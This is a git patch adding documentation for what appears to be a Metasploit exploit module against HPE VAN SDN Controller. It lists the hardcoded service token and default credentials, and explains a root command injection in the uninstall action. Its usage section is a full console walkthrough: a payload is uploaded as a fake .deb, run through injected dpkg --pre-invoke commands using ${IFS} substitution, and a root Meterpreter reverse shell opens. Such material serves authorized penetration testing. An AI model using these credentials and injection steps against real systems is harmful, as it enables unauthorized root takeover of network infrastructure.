From 12a0aaeaf121ceee28b1bce06ccd196e30fcecfe Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 3 Jul 2018 18:31:43 -0500
Subject: [PATCH] Add module doc
---
 .../exploit/linux/http/hp_van_sdn_token.md | 85 +++++++++++++++++++
 1 file changed, 85 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/hp_van_sdn_token.md
diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_token.md b/documentation/modules/exploit/linux/http/hp_van_sdn_token.md
new file mode 100644
index 0000000000..40b1195ced
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/hp_van_sdn_token.md
@@ -0,0 +1,85 @@
+## Intro
+
+This module exploits a hardcoded service token or default credentials in
+HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
+
+A root command injection was discovered in the uninstall action's name
+parameter, obviating the need to use sudo for privilege escalation.
+
+If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
+will be used for authentication. An additional login request will be
+sent.
+
+## Setup
+
+Follow .
+
+Tested on 2.7.18.0503.
+
+## Options
+
+**TOKEN**
+
+Set this to the service token. Defaults to `AuroraSdnToken37`.
+
+**USERNAME**
+
+Set this to the service username. Defaults to `sdn`.
+
+**PASSWORD**
+
+Set this to the service password. Defaults to `skyline`.
+
+## Usage
+
+```
+msf5 > use exploit/linux/http/hp_van_sdn_token
+msf5 exploit(linux/http/hp_van_sdn_token) > set rhosts 192.168.56.102
+rhosts => 192.168.56.102
+msf5 exploit(linux/http/hp_van_sdn_token) > set target Linux Dropper
+target => Linux Dropper
+msf5 exploit(linux/http/hp_van_sdn_token) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/hp_van_sdn_token) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf5 exploit(linux/http/hp_van_sdn_token) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Authenticating with service token AuroraSdnToken37
+[*] Uploading payload as fake .deb
+[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
+[*] Renaming payload and executing it
+[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
+[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
+[*] Sending stage (812100 bytes) to 192.168.56.102
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
+[+] Deleted 
/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer : 192.168.56.102
+OS : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
+Architecture : x64
+BuildTuple : x86_64-linux-musl
+Meterpreter : x64/linux
+meterpreter > 
+Background session 1? [y/N]
+msf5 exploit(linux/http/hp_van_sdn_token) > set token ""
+token => 
+msf5 exploit(linux/http/hp_van_sdn_token) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Authenticating with creds sdn:skyline
+[+] Logged in with auth token 26d7b53a73a9455eae63c346321bfe31
+[*] Uploading payload as fake .deb
+[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
+[*] Renaming payload and executing it
+[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
+[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
+[*] Sending stage (812100 bytes) to 192.168.56.102
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
+[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
+
+meterpreter > 
+```